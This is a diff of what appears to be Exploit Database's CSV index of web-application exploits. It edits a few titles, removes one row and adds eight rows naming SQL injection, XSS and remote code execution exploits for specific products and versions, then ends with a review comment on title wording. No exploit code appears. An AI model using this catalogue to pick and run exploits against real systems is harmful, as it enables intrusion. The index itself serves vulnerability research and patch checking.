 34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp,
 34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,webapps,php,
@@ -39613,13 +39613,13 @@ id,file,description,date,author,type,platform,port
 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
-40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
-40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php,
+40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-26,"Dawid Golunski",webapps,php,
+40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-25,"Dawid Golunski",webapps,php,
 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php,
 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php,
 40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",webapps,php,
 40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,webapps,php,
-40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,webapps,php,
+40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-29,anarc0der,webapps,php,
 40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,webapps,php,
 40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,webapps,hardware,
 40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,webapps,hardware,
@@ -39782,7 +39782,7 @@ id,file,description,date,author,type,platform,port
 41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware,
 41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php,
 41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php,
-41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection (Python)",2017-02-02,leonjza,webapps,linux,
+41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection",2017-02-02,leonjza,webapps,linux,
 41224,exploits/linux/webapps/41224.rb,"WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux,
 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,
 41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php,
@@ -43319,7 +43319,6 @@ id,file,description,date,author,type,platform,port
 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
-49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@@ -43685,3 +43684,11 @@ id,file,description,date,author,type,platform,port
 49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php,
 49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx,
 49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php,
+49492,exploits/php/webapps/49492.txt,"BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting",2021-01-29,LiPeiYi,webapps,php,
+49493,exploits/php/webapps/49493.txt,"Online Grading System 1.0 - 'uname' SQL Injection",2021-01-29,"Ruchi Tiwari",webapps,php,
+49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",2021-01-29,mari0x00,webapps,php,
+49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover",2021-01-29,Lyghtnox,webapps,python,
+49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php,
+49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",2021-01-29,"Richard Jones",webapps,php,
+49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",2021-01-29,"Richard Jones",webapps,php,
+49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",2021-01-29,"Darren Martyn",webapps,hardware,
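Review bot: Two of the added titles do not use the wording the rest of the index uses for the same vulnerability class. Row 49492 says `Stored Cross Site Scripting` without the hyphen that row 49498 in the same hunk has, and row 49497 abbreviates to `SQLi` where row 49493 spells out `SQL Injection`. A title search on the standard term will miss both rows, which matters when the index is used to check whether a public PoC exists for a product. I would write `'text' Stored Cross-Site Scripting` for 49492 and `Authentication Bypass SQL Injection` for 49497.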